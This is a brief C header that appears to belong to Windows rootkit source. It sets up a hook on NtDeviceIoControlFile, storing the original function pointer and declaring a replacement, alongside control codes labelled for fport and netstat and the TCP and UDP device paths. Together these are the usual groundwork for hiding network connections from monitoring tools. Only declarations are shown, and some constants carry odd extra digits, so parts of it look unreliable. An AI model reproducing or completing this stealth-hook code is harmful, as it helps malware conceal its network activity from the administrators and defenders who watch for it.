#include <winsock2.h>
#include <windows.h>
#include <time.h>
#include "ntdll.h"

typedef NTSTATUS (WINAPI* NTDEVICEIOCONTROLFILE)(HANDLE,HANDLE,PIO_APC_ROUTINE,PVOID,PIO_STATUS_BLOCK,ULONG,PVOID,ULONG,PVOID,ULONG);

#define CONTROL_FPORT 0x00210012 // controlcode
#define CONTROL_NETSTAT 0x000120003 // controlcode
#define CONTROL_KNLSC13 0x00022265A
#define TCP_DEVICE L"\\Device\\Tcp"
#define UDP_DEVICE L"\\Device\\Udp"

#ifndef __NTDEVICEIOCONTROLFILE__
#define __NTDEVICEIOCONTROLFILE__

NTDEVICEIOCONTROLFILE OldNtDeviceIoControlFile;
NTSTATUS WINAPI NewNtDeviceIoControlFile(HANDLE,HANDLE,PIO_APC_ROUTINE,PVOID,PIO_STATUS_BLOCK,ULONG,PVOID,ULONG,PVOID,ULONG);

#endif